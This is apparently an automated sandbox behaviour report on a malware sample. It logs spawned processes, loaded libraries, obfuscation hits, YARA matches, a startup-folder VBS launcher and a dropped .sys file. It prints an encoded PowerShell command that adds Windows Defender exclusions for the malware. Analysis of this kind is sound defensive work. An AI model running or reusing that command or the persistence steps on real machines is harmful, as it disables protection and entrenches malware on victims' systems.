                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\explorer.exe explorer.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe "C:\Users\user\AppData\Roaming\WindosCPUsystem.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe "C:\Users\user\AppData\Roaming\WindosCPUsystem.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: file.exeStatic file information: File size 5876736 > 1048576
                Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x59a400
                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.2235805876.0000026B59C35000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.2235805876.0000026B59C35000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: file.exe, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: WindosCPUsystem.exe.0.dr, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.file.exe.26b47020000.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                Source: 0.2.file.exe.26b47020000.0.raw.unpack, ListDecorator.cs.Net Code: Read
                Source: 0.2.file.exe.26b47020000.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                Source: 0.2.file.exe.26b47020000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                Source: 0.2.file.exe.26b47020000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                Source: Yara matchFile source: 0.2.file.exe.26b61ca0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.26b5ad72198.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2585182229.0000026B61CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2235805876.0000026B5ACAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: WindosCPUsystem.exe PID: 6600, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F29EEE push ss; iretd 0_2_00007FF848F29EFB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F200BD pushad ; iretd 0_2_00007FF848F200C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848DFD2A5 pushad ; iretd 2_2_00007FF848DFD2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FE2316 push 8B485F94h; iretd 2_2_00007FF848FE231B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FEA955 push ebp; retf 2_2_00007FF848FEA958
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF848F39EEE push ss; iretd 9_2_00007FF848F39EFB
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF848F300BD pushad ; iretd 9_2_00007FF848F300C1
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF849026235 push ss; iretd 9_2_00007FF849026252
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF849020EDD pushad ; retf 9_2_00007FF849020F01
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF849026D95 push cs; iretd 9_2_00007FF849026DB2
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF84902584D pushfd ; retf 9_2_00007FF84902586A
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF849026899 push ss; iretd 9_2_00007FF84902689A

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sysJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sysJump to dropped file
